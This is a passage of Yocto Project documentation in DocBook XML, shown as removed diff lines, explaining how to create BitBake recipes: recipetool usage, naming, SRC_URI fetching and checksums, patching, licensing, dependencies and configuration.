- <filename>devtool add</filename> command in the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-a-closer-look-at-devtool-add'>A Closer Look at <filename>devtool</filename> add</ulink>"
- section in the Yocto Project Application Development
- and the Extensible Software Development Kit (eSDK) manual.
- </para>
- </section>
-
- <section id='new-recipe-creating-the-base-recipe-using-recipetool'>
- <title>Creating the Base Recipe Using <filename>recipetool create</filename></title>
-
- <para>
- <filename>recipetool create</filename> automates creation
- of a base recipe given a set of source code files.
- As long as you can extract or point to the source files,
- the tool will construct a recipe and automatically
- configure all pre-build information into the recipe.
- For example, suppose you have an application that builds
- using Autotools.
- Creating the base recipe using
- <filename>recipetool</filename> results in a recipe
- that has the pre-build dependencies, license requirements,
- and checksums configured.
- </para>
-
- <para>
- To run the tool, you just need to be in your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- and have sourced the build environment setup script
- (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>).
- To get help on the tool, use the following command:
- <literallayout class='monospaced'>
- $ recipetool -h
- NOTE: Starting bitbake server...
- usage: recipetool [-d] [-q] [--color COLOR] [-h] &lt;subcommand&gt; ...
-
- OpenEmbedded recipe tool
-
- options:
- -d, --debug Enable debug output
- -q, --quiet Print only errors
- --color COLOR Colorize output (where COLOR is auto, always, never)
- -h, --help show this help message and exit
-
- subcommands:
- create Create a new recipe
- newappend Create a bbappend for the specified target in the specified
- layer
- setvar Set a variable within a recipe
- appendfile Create/update a bbappend to replace a target file
- appendsrcfiles Create/update a bbappend to add or replace source files
- appendsrcfile Create/update a bbappend to add or replace a source file
- Use recipetool &lt;subcommand&gt; --help to get help on a specific command
- </literallayout>
- </para>
-
- <para>
- Running
- <filename>recipetool create -o</filename>&nbsp;<replaceable>OUTFILE</replaceable>
- creates the base recipe and locates it properly in the
- layer that contains your source files.
- Following are some syntax examples:
- </para>
-
- <para>
- Use this syntax to generate a recipe based on
- <replaceable>source</replaceable>.
- Once generated, the recipe resides in the existing source
- code layer:
- <literallayout class='monospaced'>
- recipetool create -o <replaceable>OUTFILE</replaceable>&nbsp;<replaceable>source</replaceable>
- </literallayout>
- Use this syntax to generate a recipe using code that you
- extract from <replaceable>source</replaceable>.
- The extracted code is placed in its own layer defined
- by <replaceable>EXTERNALSRC</replaceable>.
- <literallayout class='monospaced'>
- recipetool create -o <replaceable>OUTFILE</replaceable> -x <replaceable>EXTERNALSRC</replaceable> <replaceable>source</replaceable>
- </literallayout>
- Use this syntax to generate a recipe based on
- <replaceable>source</replaceable>.
- The options direct <filename>recipetool</filename> to
- generate debugging information.
- Once generated, the recipe resides in the existing source
- code layer:
- <literallayout class='monospaced'>
- recipetool create -d -o <replaceable>OUTFILE</replaceable> <replaceable>source</replaceable>
- </literallayout>
- </para>
- </section>
-
- <section id='new-recipe-locating-and-using-a-similar-recipe'>
- <title>Locating and Using a Similar Recipe</title>
-
- <para>
- Before writing a recipe from scratch, it is often useful to
- discover whether someone else has already written one that
- meets (or comes close to meeting) your needs.
- The Yocto Project and OpenEmbedded communities maintain many
- recipes that might be candidates for what you are doing.
- You can find a good central index of these recipes in the
- <ulink url='http://layers.openembedded.org'>OpenEmbedded Layer Index</ulink>.
- </para>
-
- <para>
- Working from an existing recipe or a skeleton recipe is the
- best way to get started.
- Here are some points on both methods:
- <itemizedlist>
- <listitem><para><emphasis>Locate and modify a recipe that
- is close to what you want to do:</emphasis>
- This method works when you are familiar with the
- current recipe space.
- The method does not work so well for those new to
- the Yocto Project or writing recipes.</para>
- <para>Some risks associated with this method are
- using a recipe that has areas totally unrelated to
- what you are trying to accomplish with your recipe,
- not recognizing areas of the recipe that you might
- have to add from scratch, and so forth.
- All these risks stem from unfamiliarity with the
- existing recipe space.</para></listitem>
- <listitem><para><emphasis>Use and modify the following
- skeleton recipe:</emphasis>
- If for some reason you do not want to use
- <filename>recipetool</filename> and you cannot
- find an existing recipe that is close to meeting
- your needs, you can use the following structure to
- provide the fundamental areas of a new recipe.
- <literallayout class='monospaced'>
- DESCRIPTION = ""
- HOMEPAGE = ""
- LICENSE = ""
- SECTION = ""
- DEPENDS = ""
- LIC_FILES_CHKSUM = ""
-
- SRC_URI = ""
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='new-recipe-storing-and-naming-the-recipe'>
- <title>Storing and Naming the Recipe</title>
-
- <para>
- Once you have your base recipe, you should put it in your
- own layer and name it appropriately.
- Locating it correctly ensures that the OpenEmbedded build
- system can find it when you use BitBake to process the
- recipe.
- </para>
-
- <itemizedlist>
- <listitem><para><emphasis>Storing Your Recipe:</emphasis>
- The OpenEmbedded build system locates your recipe
- through the layer's <filename>conf/layer.conf</filename>
- file and the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILES'><filename>BBFILES</filename></ulink>
- variable.
- This variable sets up a path from which the build system can
- locate recipes.
- Here is the typical use:
- <literallayout class='monospaced'>
- BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
- ${LAYERDIR}/recipes-*/*/*.bbappend"
- </literallayout>
- Consequently, you need to be sure you locate your new recipe
- inside your layer such that it can be found.</para>
- <para>You can find more information on how layers are
- structured in the
- "<link linkend='understanding-and-creating-layers'>Understanding and Creating Layers</link>"
- section.</para></listitem>
- <listitem><para><emphasis>Naming Your Recipe:</emphasis>
- When you name your recipe, you need to follow this naming
- convention:
- <literallayout class='monospaced'>
- <replaceable>basename</replaceable>_<replaceable>version</replaceable>.bb
- </literallayout>
- Use lower-cased characters and do not include the reserved
- suffixes <filename>-native</filename>,
- <filename>-cross</filename>, <filename>-initial</filename>,
- or <filename>-dev</filename> casually (i.e. do not use them
- as part of your recipe name unless the string applies).
- Here are some examples:
- <literallayout class='monospaced'>
- cups_1.7.0.bb
- gawk_4.0.2.bb
- irssi_0.8.16-rc1.bb
- </literallayout></para></listitem>
- </itemizedlist>
- </section>
-
- <section id='new-recipe-running-a-build-on-the-recipe'>
- <title>Running a Build on the Recipe</title>
-
- <para>
- Creating a new recipe is usually an iterative process that
- requires using BitBake to process the recipe multiple times in
- order to progressively discover and add information to the
- recipe file.
- </para>
-
- <para>
- Assuming you have sourced the build environment setup script (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>)
- and you are in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- use BitBake to process your recipe.
- All you need to provide is the
- <filename><replaceable>basename</replaceable></filename> of the recipe as described
- in the previous section:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>basename</replaceable>
- </literallayout>
-
- </para>
-
- <para>
- During the build, the OpenEmbedded build system creates a
- temporary work directory for each recipe
- (<filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename>)
- where it keeps extracted source files, log files, intermediate
- compilation and packaging files, and so forth.
- </para>
-
- <para>
- The path to the per-recipe temporary work directory depends
- on the context in which it is being built.
- The quickest way to find this path is to have BitBake return it
- by running the following:
- <literallayout class='monospaced'>
- $ bitbake -e <replaceable>basename</replaceable> | grep ^WORKDIR=
- </literallayout>
- As an example, assume a Source Directory top-level folder named
- <filename>poky</filename>, a default Build Directory at
- <filename>poky/build</filename>, and a
- <filename>qemux86-poky-linux</filename> machine target system.
- Furthermore, suppose your recipe is named
- <filename>foo_1.3.0.bb</filename>.
- In this case, the work directory the build system uses to
- build the package would be as follows:
- <literallayout class='monospaced'>
- poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
- </literallayout>
- Inside this directory you can find sub-directories such as
- <filename>image</filename>, <filename>packages-split</filename>,
- and <filename>temp</filename>.
- After the build, you can examine these to determine how well
- the build went.
- <note>
- You can find log files for each task in the recipe's
- <filename>temp</filename> directory (e.g.
- <filename>poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0/temp</filename>).
- Log files are named <filename>log.<replaceable>taskname</replaceable></filename>
- (e.g. <filename>log.do_configure</filename>,
- <filename>log.do_fetch</filename>, and
- <filename>log.do_compile</filename>).
- </note>
- </para>
-
- <para>
- You can find more information about the build process in
- "<ulink url='&YOCTO_DOCS_OM_URL;#overview-development-environment'>The Yocto Project Development Environment</ulink>"
- chapter of the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='new-recipe-fetching-code'>
- <title>Fetching Code</title>
-
- <para>
- The first thing your recipe must do is specify how to fetch
- the source files.
- Fetching is controlled mainly through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable.
- Your recipe must have a <filename>SRC_URI</filename> variable
- that points to where the source is located.
- For a graphical representation of source locations, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#sources-dev-environment'>Sources</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
- task uses the prefix of each entry in the
- <filename>SRC_URI</filename> variable value to determine which
- <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetcher</ulink>
- to use to get your source files.
- It is the <filename>SRC_URI</filename> variable that triggers
- the fetcher.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- task uses the variable after source is fetched to apply
- patches.
- The OpenEmbedded build system uses
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESOVERRIDES'><filename>FILESOVERRIDES</filename></ulink>
- for scanning directory locations for local files in
- <filename>SRC_URI</filename>.
- </para>
-
- <para>
- The <filename>SRC_URI</filename> variable in your recipe must
- define each unique location for your source files.
- It is good practice to not hard-code version numbers in a URL used
- in <filename>SRC_URI</filename>.
- Rather than hard-code these values, use
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink><filename>}</filename>,
- which causes the fetch process to use the version specified in
- the recipe filename.
- Specifying the version in this manner means that upgrading the
- recipe to a future version is as simple as renaming the recipe
- to match the new version.
- </para>
-
- <para>
- Here is a simple example from the
- <filename>meta/recipes-devtools/strace/strace_5.5.bb</filename>
- recipe where the source comes from a single tarball.
- Notice the use of the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- variable:
- <literallayout class='monospaced'>
- SRC_URI = "https://strace.io/files/${PV}/strace-${PV}.tar.xz \
- </literallayout>
- </para>
-
- <para>
- Files mentioned in <filename>SRC_URI</filename> whose names end
- in a typical archive extension (e.g. <filename>.tar</filename>,
- <filename>.tar.gz</filename>, <filename>.tar.bz2</filename>,
- <filename>.zip</filename>, and so forth), are automatically
- extracted during the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
- task.
- For another example that specifies these types of files, see
- the
- "<link linkend='new-recipe-autotooled-package'>Autotooled Package</link>"
- section.
- </para>
-
- <para>
- Another way of specifying source is from an SCM.
- For Git repositories, you must specify
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
- and you should specify
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- to include the revision with
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>.
- Here is an example from the recipe
- <filename>meta/recipes-kernel/blktrace/blktrace_git.bb</filename>:
- <literallayout class='monospaced'>
- SRCREV = "d6918c8832793b4205ed3bfede78c2f915c23385"
-
- PR = "r6"
- PV = "1.0.5+git${SRCPV}"
-
- SRC_URI = "git://git.kernel.dk/blktrace.git \
- file://ldflags.patch"
- </literallayout>
- </para>
-
- <para>
- If your <filename>SRC_URI</filename> statement includes
- URLs pointing to individual files fetched from a remote server
- other than a version control system, BitBake attempts to
- verify the files against checksums defined in your recipe to
- ensure they have not been tampered with or otherwise modified
- since the recipe was written.
- Two checksums are used:
- <filename>SRC_URI[md5sum]</filename> and
- <filename>SRC_URI[sha256sum]</filename>.
- </para>
-
- <para>
- If your <filename>SRC_URI</filename> variable points to
- more than a single URL (excluding SCM URLs), you need to
- provide the <filename>md5</filename> and
- <filename>sha256</filename> checksums for each URL.
- For these cases, you provide a name for each URL as part of
- the <filename>SRC_URI</filename> and then reference that name
- in the subsequent checksum statements.
- Here is an example combining lines from the files
- <filename>git.inc</filename> and
- <filename>git_2.24.1.bb</filename>:
- <literallayout class='monospaced'>
- SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
- ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
-
- SRC_URI[tarball.md5sum] = "166bde96adbbc11c8843d4f8f4f9811b"
- SRC_URI[tarball.sha256sum] = "ad5334956301c86841eb1e5b1bb20884a6bad89a10a6762c958220c7cf64da02"
- SRC_URI[manpages.md5sum] = "31c2272a8979022497ba3d4202df145d"
- SRC_URI[manpages.sha256sum] = "9a7ae3a093bea39770eb96ca3e5b40bff7af0b9f6123f089d7821d0e5b8e1230"
- </literallayout>
- </para>
-
- <para>
- Proper values for <filename>md5</filename> and
- <filename>sha256</filename> checksums might be available
- with other signatures on the download page for the upstream
- source (e.g. <filename>md5</filename>,
- <filename>sha1</filename>, <filename>sha256</filename>,
- <filename>GPG</filename>, and so forth).
- Because the OpenEmbedded build system only deals with
- <filename>sha256sum</filename> and <filename>md5sum</filename>,
- you should verify all the signatures you find by hand.
- </para>
-
- <para>
- If no <filename>SRC_URI</filename> checksums are specified
- when you attempt to build the recipe, or you provide an
- incorrect checksum, the build will produce an error for each
- missing or incorrect checksum.
- As part of the error message, the build system provides
- the checksum string corresponding to the fetched file.
- Once you have the correct checksums, you can copy and paste
- them into your recipe and then run the build again to continue.
- <note>
- As mentioned, if the upstream source provides signatures
- for verifying the downloaded source code, you should
- verify those manually before setting the checksum values
- in the recipe and continuing with the build.
- </note>
- </para>
-
- <para>
- This final example is a bit more complicated and is from the
- <filename>meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.20.bb</filename>
- recipe.
- The example's <filename>SRC_URI</filename> statement identifies
- multiple files as the source files for the recipe: a tarball, a
- patch file, a desktop file, and an icon.
- <literallayout class='monospaced'>
- SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
- file://xwc.patch \
- file://rxvt.desktop \
- file://rxvt.png"
- </literallayout>
- </para>
-
- <para>
- When you specify local files using the
- <filename>file://</filename> URI protocol, the build system
- fetches files from the local machine.
- The path is relative to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- variable and searches specific directories in a certain order:
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BP'><filename>BP</filename></ulink><filename>}</filename>,
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink><filename>}</filename>,
- and <filename>files</filename>.
- The directories are assumed to be subdirectories of the
- directory in which the recipe or append file resides.
- For another example that specifies these types of files, see the
- "<link linkend='new-recipe-single-c-file-package-hello-world'>Single .c File Package (Hello World!)</link>"
- section.
- </para>
-
- <para>
- The previous example also specifies a patch file.
- Patch files are files whose names usually end in
- <filename>.patch</filename> or <filename>.diff</filename> but
- can end with compressed suffixes such as
- <filename>diff.gz</filename> and
- <filename>patch.bz2</filename>, for example.
- The build system automatically applies patches as described
- in the
- "<link linkend='new-recipe-patching-code'>Patching Code</link>" section.
- </para>
- </section>
-
- <section id='new-recipe-unpacking-code'>
- <title>Unpacking Code</title>
-
- <para>
- During the build, the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
- task unpacks the source with
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>
- pointing to where it is unpacked.
- </para>
-
- <para>
- If you are fetching your source files from an upstream source
- archived tarball and the tarball's internal structure matches
- the common convention of a top-level subdirectory named
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink><filename>}-${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink><filename>}</filename>,
- then you do not need to set <filename>S</filename>.
- However, if <filename>SRC_URI</filename> specifies to fetch
- source from an archive that does not use this convention,
- or from an SCM like Git or Subversion, your recipe needs to
- define <filename>S</filename>.
- </para>
-
- <para>
- If processing your recipe using BitBake successfully unpacks
- the source files, you need to be sure that the directory
- pointed to by <filename>${S}</filename> matches the structure
- of the source.
- </para>
- </section>
-
- <section id='new-recipe-patching-code'>
- <title>Patching Code</title>
-
- <para>
- Sometimes it is necessary to patch code after it has been
- fetched.
- Any files mentioned in <filename>SRC_URI</filename> whose
- names end in <filename>.patch</filename> or
- <filename>.diff</filename> or compressed versions of these
- suffixes (e.g. <filename>diff.gz</filename> are treated as
- patches.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- task automatically applies these patches.
- </para>
-
- <para>
- The build system should be able to apply patches with the "-p1"
- option (i.e. one directory level in the path will be stripped
- off).
- If your patch needs to have more directory levels stripped off,
- specify the number of levels using the "striplevel" option in
- the <filename>SRC_URI</filename> entry for the patch.
- Alternatively, if your patch needs to be applied in a specific
- subdirectory that is not specified in the patch file, use the
- "patchdir" option in the entry.
- </para>
-
- <para>
- As with all local files referenced in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- using <filename>file://</filename>, you should place
- patch files in a directory next to the recipe either
- named the same as the base name of the recipe
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-BP'><filename>BP</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink>)
- or "files".
- </para>
- </section>
-
- <section id='new-recipe-licensing'>
- <title>Licensing</title>
-
- <para>
- Your recipe needs to have both the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
- variables:
- <itemizedlist>
- <listitem><para><emphasis><filename>LICENSE</filename>:</emphasis>
- This variable specifies the license for the software.
- If you do not know the license under which the software
- you are building is distributed, you should go to the
- source code and look for that information.
- Typical files containing this information include
- <filename>COPYING</filename>,
- <filename>LICENSE</filename>, and
- <filename>README</filename> files.
- You could also find the information near the top of
- a source file.
- For example, given a piece of software licensed under
- the GNU General Public License version 2, you would
- set <filename>LICENSE</filename> as follows:
- <literallayout class='monospaced'>
- LICENSE = "GPLv2"
- </literallayout></para>
- <para>The licenses you specify within
- <filename>LICENSE</filename> can have any name as long
- as you do not use spaces, since spaces are used as
- separators between license names.
- For standard licenses, use the names of the files in
- <filename>meta/files/common-licenses/</filename>
- or the <filename>SPDXLICENSEMAP</filename> flag names
- defined in <filename>meta/conf/licenses.conf</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>LIC_FILES_CHKSUM</filename>:</emphasis>
- The OpenEmbedded build system uses this variable to
- make sure the license text has not changed.
- If it has, the build produces an error and it affords
- you the chance to figure it out and correct the problem.
- </para>
- <para>You need to specify all applicable licensing
- files for the software.
- At the end of the configuration step, the build process
- will compare the checksums of the files to be sure
- the text has not changed.
- Any differences result in an error with the message
- containing the current checksum.
- For more explanation and examples of how to set the
- <filename>LIC_FILES_CHKSUM</filename> variable, see the
- "<link link='usingpoky-configuring-LIC_FILES_CHKSUM'>Tracking License Changes</link>"
- section.</para>
-
- <para>To determine the correct checksum string, you
- can list the appropriate files in the
- <filename>LIC_FILES_CHKSUM</filename> variable with
- incorrect md5 strings, attempt to build the software,
- and then note the resulting error messages that will
- report the correct md5 strings.
- See the
- "<link linkend='new-recipe-fetching-code'>Fetching Code</link>"
- section for additional information.
- </para>
-
- <para>
- Here is an example that assumes the software has a
- <filename>COPYING</filename> file:
- <literallayout class='monospaced'>
- LIC_FILES_CHKSUM = "file://COPYING;md5=xxx"
- </literallayout>
- When you try to build the software, the build system
- will produce an error and give you the correct string
- that you can substitute into the recipe file for a
- subsequent build.
- </para></listitem>
- </itemizedlist>
- </para>
-
-<!--
-
- <para>
- For trying this out I created a new recipe named
- <filename>htop_1.0.2.bb</filename> and put it in
- <filename>poky/meta/recipes-extended/htop</filename>.
- There are two license type statements in my very simple
- recipe:
- <literallayout class='monospaced'>
- LICENSE = ""
-
- LIC_FILES_CHKSUM = ""
-
- SRC_URI[md5sum] = ""
- SRC_URI[sha256sum] = ""
- </literallayout>
- Evidently, you need to run a <filename>bitbake -c cleanall htop</filename>.
- Next, you delete or comment out the two <filename>SRC_URI</filename>
- lines at the end and then attempt to build the software with
- <filename>bitbake htop</filename>.
- Doing so causes BitBake to report some errors and and give
- you the actual strings you need for the last two
- <filename>SRC_URI</filename> lines.
- Prior to this, you have to dig around in the home page of the
- source for <filename>htop</filename> and determine that the
- software is released under GPLv2.
- You can provide that in the <filename>LICENSE</filename>
- statement.
- Now you edit your recipe to have those two strings for
- the <filename>SRC_URI</filename> statements:
- <literallayout class='monospaced'>
- LICENSE = "GPLv2"
-
- LIC_FILES_CHKSUM = ""
-
- SRC_URI = "${SOURCEFORGE_MIRROR}/htop/htop-${PV}.tar.gz"
- SRC_URI[md5sum] = "0d01cca8df3349c74569cefebbd9919e"
- SRC_URI[sha256sum] = "ee60657b044ece0df096c053060df7abf3cce3a568ab34d260049e6a37ccd8a1"
- </literallayout>
- At this point, you can build the software again using the
- <filename>bitbake htop</filename> command.
- There is just a set of errors now associated with the
- empty <filename>LIC_FILES_CHKSUM</filename> variable now.
- </para>
--->
-
- </section>
-
- <section id='new-dependencies'>
- <title>Dependencies</title>
-
- <para>
- Most software packages have a short list of other packages
- that they require, which are called dependencies.
- These dependencies fall into two main categories: build-time
- dependencies, which are required when the software is built;
- and runtime dependencies, which are required to be installed
- on the target in order for the software to run.
- </para>
-
- <para>
- Within a recipe, you specify build-time dependencies using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- variable.
- Although nuances exist, items specified in
- <filename>DEPENDS</filename> should be names of other recipes.
- It is important that you specify all build-time dependencies
- explicitly.
- If you do not, due to the parallel nature of BitBake's
- execution, you can end up with a race condition where the
- dependency is present for one task of a recipe (e.g.
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>)
- and then gone when the next task runs (e.g.
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>).
- </para>
-
- <para>
- Another consideration is that configure scripts might
- automatically check for optional dependencies and enable
- corresponding functionality if those dependencies are found.
- This behavior means that to ensure deterministic results and
- thus avoid more race conditions, you need to either explicitly
- specify these dependencies as well, or tell the configure
- script explicitly to disable the functionality.
- If you wish to make a recipe that is more generally useful
- (e.g. publish the recipe in a layer for others to use),
- instead of hard-disabling the functionality, you can use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></ulink>
- variable to allow functionality and the corresponding
- dependencies to be enabled and disabled easily by other
- users of the recipe.
- </para>
-
- <para>
- Similar to build-time dependencies, you specify runtime
- dependencies through a variable -
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>,
- which is package-specific.
- All variables that are package-specific need to have the name
- of the package added to the end as an override.
- Since the main package for a recipe has the same name as the
- recipe, and the recipe's name can be found through the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
- variable, then you specify the dependencies for the main
- package by setting <filename>RDEPENDS_${PN}</filename>.
- If the package were named <filename>${PN}-tools</filename>,
- then you would set <filename>RDEPENDS_${PN}-tools</filename>,
- and so forth.
- </para>
-
- <para>
- Some runtime dependencies will be set automatically at
- packaging time.
- These dependencies include any shared library dependencies
- (i.e. if a package "example" contains "libexample" and
- another package "mypackage" contains a binary that links to
- "libexample" then the OpenEmbedded build system will
- automatically add a runtime dependency to "mypackage" on
- "example").
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
- section in the Yocto Project Overview and Concepts Manual for
- further details.
- </para>
- </section>
-
- <section id='new-recipe-configuring-the-recipe'>
- <title>Configuring the Recipe</title>
-
- <para>
- Most software provides some means of setting build-time
- configuration options before compilation.
- Typically, setting these options is accomplished by running a
- configure script with options, or by modifying a build
- configuration file.
- <note>
- As of Yocto Project Release 1.7, some of the core recipes
- that package binary configuration scripts now disable the
- scripts due to the scripts previously requiring error-prone
- path substitution.
- The OpenEmbedded build system uses
- <filename>pkg-config</filename> now, which is much more
- robust.
- You can find a list of the <filename>*-config</filename>
- scripts that are disabled list in the
- "<ulink url='&YOCTO_DOCS_REF_URL;#migration-1.7-binary-configuration-scripts-disabled'>Binary Configuration Scripts Disabled</ulink>"
- section in the Yocto Project Reference Manual.
- </note>
- </para>
-
- <para>
- A major part of build-time configuration is about checking for
- build-time dependencies and possibly enabling optional
- functionality as a result.
- You need to specify any build-time dependencies for the
- software you are building in your recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- value, in terms of other recipes that satisfy those
- dependencies.
- You can often find build-time or runtime
- dependencies described in the software's documentation.
- </para>
-
- <para>
- The following list provides configuration items of note based
- on how your software is built:
- <itemizedlist>
- <listitem><para><emphasis>Autotools:</emphasis>
- If your source files have a
- <filename>configure.ac</filename> file, then your
- software is built using Autotools.
- If this is the case, you just need to worry about
- modifying the configuration.</para>
-
- <para>When using Autotools, your recipe needs to inherit
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
- class and your recipe does not have to contain a
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
- task.
- However, you might still want to make some adjustments.
- For example, you can set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
- to pass any needed configure options that are specific
- to the recipe.
- </para></listitem>
- <listitem><para><emphasis>CMake:</emphasis>
- If your source files have a
- <filename>CMakeLists.txt</filename> file, then your
- software is built using CMake.
- If this is the case, you just need to worry about
- modifying the configuration.</para>
-
- <para>When you use CMake, your recipe needs to inherit
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-cmake'><filename>cmake</filename></ulink>
- class and your recipe does not have to contain a
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
- task.
- You can make some adjustments by setting
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECMAKE'><filename>EXTRA_OECMAKE</filename></ulink>
- to pass any needed configure options that are specific
- to the recipe.
- <note>
- If you need to install one or more custom CMake
- toolchain files that are supplied by the
- application you are building, install the files to
- <filename>${D}${datadir}/cmake/</filename> Modules
- during
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>.
- </note>
- </para></listitem>
- <listitem><para><emphasis>Other:</emphasis>
- If your source files do not have a
- <filename>configure.ac</filename> or
- <filename>CMakeLists.txt</filename> file, then your
- software is built using some method other than Autotools
- or CMake.
- If this is the case, you normally need to provide a
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
- task in your recipe
- unless, of course, there is nothing to configure.
- </para>
- <para>Even if your software is not being built by
- Autotools or CMake, you still might not need to deal
- with any configuration issues.
- You need to determine if configuration is even a required step.
- You might need to modify a Makefile or some configuration file
- used for the build to specify necessary build options.
- Or, perhaps you might need to run a provided, custom
- configure script with the appropriate options.</para>
- <para>For the case involving a custom configure
- script, you would run
- <filename>./configure --help</filename> and look for
- the options you need to set.</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Once configuration succeeds, it is always good practice to
- look at the <filename>log.do_configure</filename> file to
- ensure that the appropriate options have been enabled and no
- additional build-time dependencies need to be added to
- <filename>DEPENDS</filename>.
- For example, if the configure script reports that it found
- something not mentioned in <filename>DEPENDS</filename>, or
- that it did not find something that it needed for some
- desired optional functionality, then you would need to add
- those to <filename>DEPENDS</filename>.
- Looking at the log might also reveal items being checked for,
- enabled, or both that you do not want, or items not being found
- that are in <filename>DEPENDS</filename>, in which case
- you would need to look at passing extra options to the
- configure script as needed.
- For reference information on configure options specific to the
- software you are building, you can consult the output of the
- <filename>./configure --help</filename> command within
- <filename>${S}</filename> or consult the software's upstream
- documentation.
- </para>
- </section>
-
- <section id='new-recipe-using-headers-to-interface-with-devices'>
- <title>Using Headers to Interface with Devices</title>
-
- <para>
- If your recipe builds an application that needs to
- communicate with some device or needs an API into a custom
- kernel, you will need to provide appropriate header files.
- Under no circumstances should you ever modify the existing
- <filename>meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc</filename>
- file.
- These headers are used to build <filename>libc</filename> and
- must not be compromised with custom or machine-specific
- header information.
- If you customize <filename>libc</filename> through modified
- headers all other applications that use
- <filename>libc</filename> thus become affected.
- <note><title>Warning</title>
- Never copy and customize the <filename>libc</filename>
- header file (i.e.
